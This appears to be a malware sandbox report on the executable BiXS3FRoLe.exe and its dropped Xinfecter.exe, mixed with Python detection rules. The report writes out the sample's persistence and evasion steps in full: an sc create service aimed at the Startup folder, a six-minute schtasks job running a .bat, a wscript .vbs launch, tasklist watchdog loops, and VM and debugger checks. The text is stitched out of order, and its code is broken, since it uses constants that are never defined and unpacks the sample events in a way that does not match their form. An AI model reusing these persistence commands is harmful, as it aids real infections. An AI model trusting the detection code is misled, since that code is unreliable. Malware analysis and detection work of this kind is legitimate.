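    m = re.search(re.escape(flag) + r'\s+("[^"]*"|\S+)', cmdline, re.I)
    return m.group(1).strip('"').strip("'") if m else None


def check_schtasks(cmd):
    """Short-interval scheduled task whose action is a script in a user-writable directory."""
    if not re.search(r"\bschtasks(?:\.exe)?\b.*\s/create\b", cmd, re.I):
        return None
    interval = _arg_after("/mo", cmd)
    action = _arg_after("/tr", cmd) or ""
    reasons = []
    if ((_arg_after("/sc", cmd) or "").lower() == "minute" and interval
            and interval.isdigit() and int(interval) <= MAX_BENIGN_MINUTES):
        reasons.append(f"runs every {interval} min")
    if USER_WRITABLE.search(action) and SCRIPT_EXT.search(action):
        reasons.append(f"action is a script under a user-writable path ({action})")
    if not reasons:
        return None
    return f"scheduled task {_arg_after('/tn', cmd)!r}: " + "; ".join(reasons)


def check_sc_create(cmd):
    """Service whose binPath lives under a user profile (the sample uses the Startup folder)."""
    name = re.search(r"\bsc(?:\.exe)?\s+create\s+(\S+)", cmd, re.I)
    path = re.search(r'binpath=\s*(?:"([^"]+)"|(\S+))', cmd, re.I)
    if not (name and path):
        return None
    binpath = path.group(1) or path.group(2)
    if not USER_WRITABLE.search(binpath):
        return None
    where = "the Startup folder" if STARTUP_DIR.search(binpath) else "a user-writable path"
    return f"service {name.group(1)!r} binPath points into {where}: {binpath}"


def check_script_host(cmd):
    """wscript/cscript executing a script from a user-writable directory."""
    m = re.search(r'\b[wc]script(?:\.exe)?"?\s+"?([^"]+\.(?:vbs|vbe|js|jse|wsf))', cmd, re.I)
    if m and USER_WRITABLE.search(m.group(1)):
        return f"script host running {m.group(1)}"
    return None


def check_watchdog(events):
    """A parent that repeatedly pairs a filtered tasklist with timeout /t N is polling for a process."""
    per_parent = defaultdict(Counter)
    for parent, cmd in events:
        if re.search(r"\btasklist(?:\.exe)?\b.*\s(?:/fi|/v)\b", cmd, re.I):
            per_parent[parent]["tasklist"] += 1
        elif re.search(r"\btimeout(?:\.exe)?\s+/t\s+\d+", cmd, re.I):
            per_parent[parent]["timeout"] += 1
    return [
        (parent, f"{c['tasklist']} filtered tasklist and {c['timeout']} timeout calls")
        for parent, c in per_parent.items()
        if c["tasklist"] >= 2 and c["timeout"] >= 2
    ]


def scan(events):
    """Return (rule, parent, detail) findings for a list of (parent, cmdline) events."""
    findings = []
    for parent, cmd in events:
        for rule in (check_schtasks, check_sc_create, check_script_host):
            detail = rule(cmd)
            if detail:
                findings.append((rule.__name__, parent, detail))
    findings.extend(("check_watchdog", parent, detail) for parent, detail in check_watchdog(events))
    return findings


if __name__ == "__main__":
    for rule, parent, detail in scan(SAMPLE_EVENTS):
        print(f"[{rule}] parent={parent}: {detail}")
```

      Run against the constructed events, the scan yields exactly one finding per rule and none for the two benign look-alikes; on a real host the same functions would be fed from Sysmon Event ID 1 or Security 4688 command lines instead of the list above.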

      Hooking and other Techniques for Hiding and Protection

      Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 3586
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AE9908 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00AE9908
      Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
      Source: C:\Windows\System32\svchost.exe | File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | API coverage: 9.2 %
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | API coverage: 2.5 %
      Source: C:\Windows\SysWOW64\timeout.exe TID: 7468 | Thread sleep count: 119 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 5844 | Thread sleep count: 131 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 8012 | Thread sleep count: 131 > 30
      Source: C:\Windows\SysWOW64\timeout.exe TID: 7540 | Thread sleep count: 128 > 30
      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File Volume queried: C:\ FullSizeInformation
      Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
      Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
      Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\ FullSizeInformation
      Source: C:\Windows\System32\svchost.exe | File Volume queried: C:\Windows\System32 FullSizeInformation
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A88240 SetErrorMode,FindFirstFileW, 0_2_00A88240
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A88380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW, 0_2_00A88380
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A89ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW, 0_2_00A89ABA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A8AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose, 0_2_00A8AF50
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B3BA6B FindFirstFileExA, 0_2_00B3BA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00028240 SetErrorMode,FindFirstFileW, 48_2_00028240
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00028380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW, 48_2_00028380
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_0002AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose, 48_2_0002AF50
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000DBA6B FindFirstFileExA, 48_2_000DBA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00029ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW, 48_2_00029ABA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A8D950 GetLogicalDriveStringsA, 0_2_00A8D950
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D29000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
      Source: svchost.exe, 00000009.00000002.2504829562.000001E74C64F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000009.00000002.2504676976.000001E74C62B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, BiXS3FRoLe.exe, 00000000.00000002.2504707100.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000026.00000002.1340054340.000001F1F6C8C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: svchost.exe, 00000009.00000002.2504497159.000001E74C602000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
      Source: svchost.exe, 00000009.00000002.2505170981.000001E74C68E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000009.00000002.2504676976.000001E74C62B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: svchost.exe, 00000009.00000002.2505013739.000001E74C664000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
      Source: svchost.exe, 00000009.00000002.2504829562.000001E74C64F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: svchost.exe, 00000009.00000002.2504829562.000001E74C64F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\\?\Volume{1a4b1382-eeb5-4d59-b0fa-b93f83a518e1}\
      Source: C:\Windows\SysWOW64\tasklist.exe | Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B24F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B24F58
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B100BB LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00B100BB
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B20E79 mov eax, dword ptr fs:[00000030h] 0_2_00B20E79
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000C0E79 mov eax, dword ptr fs:[00000030h] 48_2_000C0E79
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B002E0 TlsGetValue,TlsSetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00B002E0
      Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B24F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B24F58
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B0176D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00B0176D
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B01968 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B01968
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B01ACA SetUnhandledExceptionFilter, 0_2_00B01ACA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000C4F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_000C4F58
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000A176D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_000A176D
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000A1968 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_000A1968
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000A1ACA SetUnhandledExceptionFilter, 48_2_000A1ACA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /i "os name"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /i "original"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /v
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I /c "dcdcf"
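The process-creation entries above document a persistence and watchdog chain: sc.exe registers a service (SqlBakup) whose binPath is the dropped Xinfecter.exe in the user's Startup folder, schtasks.exe schedules a .bat from C:\Users\user\AppData\ every 6 minutes, wscript.exe runs a .vbs from that same directory, and a cmd loop sleeps 15 seconds and polls tasklist for BiXS3FRoLe.exe. The detection logic below is an added example, not part of the Joe Sandbox report or of the sample; it runs over constructed process-creation events modelled on those command lines (the ParentImage/Image/CommandLine keys are an assumed, Sysmon-style schema) and flags each of the four behaviours while leaving a benign scheduled task alone.

```python
import re
from collections import Counter

# Constructed process-creation events (not taken from a real log), modelled on
# the cmd.exe / sc.exe / schtasks.exe / wscript.exe command lines listed in this
# report. The keys ParentImage, Image and CommandLine are an assumed,
# Sysmon-style schema chosen for this example.
CMD = r"C:\Windows\SysWOW64\cmd.exe"
STARTUP = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\user\Desktop\BiXS3FRoLe.exe", "Image": CMD,
     "CommandLine": r'C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"'},
    # Both spellings appear in the report; sc.exe only accepts "start= auto" (space required).
    {"ParentImage": CMD, "Image": r"C:\Windows\SysWOW64\sc.exe",
     "CommandLine": f'sc create SqlBakup binPath= "{STARTUP}\\Xinfecter.exe" start=auto'},
    {"ParentImage": CMD, "Image": r"C:\Windows\SysWOW64\sc.exe",
     "CommandLine": f'sc create SqlBakup binPath= "{STARTUP}\\Xinfecter.exe" start= auto'},
    {"ParentImage": CMD, "Image": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"'},
    {"ParentImage": CMD, "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'''schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f'''},
    # Benign control: a daily task pointing into Program Files must not fire.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'},
]
# Three sleep-then-poll cycles, as in the report's timeout/tasklist sequence.
for _ in range(3):
    SAMPLE_EVENTS.append({"ParentImage": CMD, "Image": r"C:\Windows\SysWOW64\timeout.exe",
                          "CommandLine": "timeout /t 15 /nobreak"})
    SAMPLE_EVENTS.append({"ParentImage": CMD, "Image": r"C:\Windows\SysWOW64\tasklist.exe",
                          "CommandLine": r'tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv'})

STARTUP_DIR_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
APPDATA_RE = re.compile(r"\\AppData\\", re.I)
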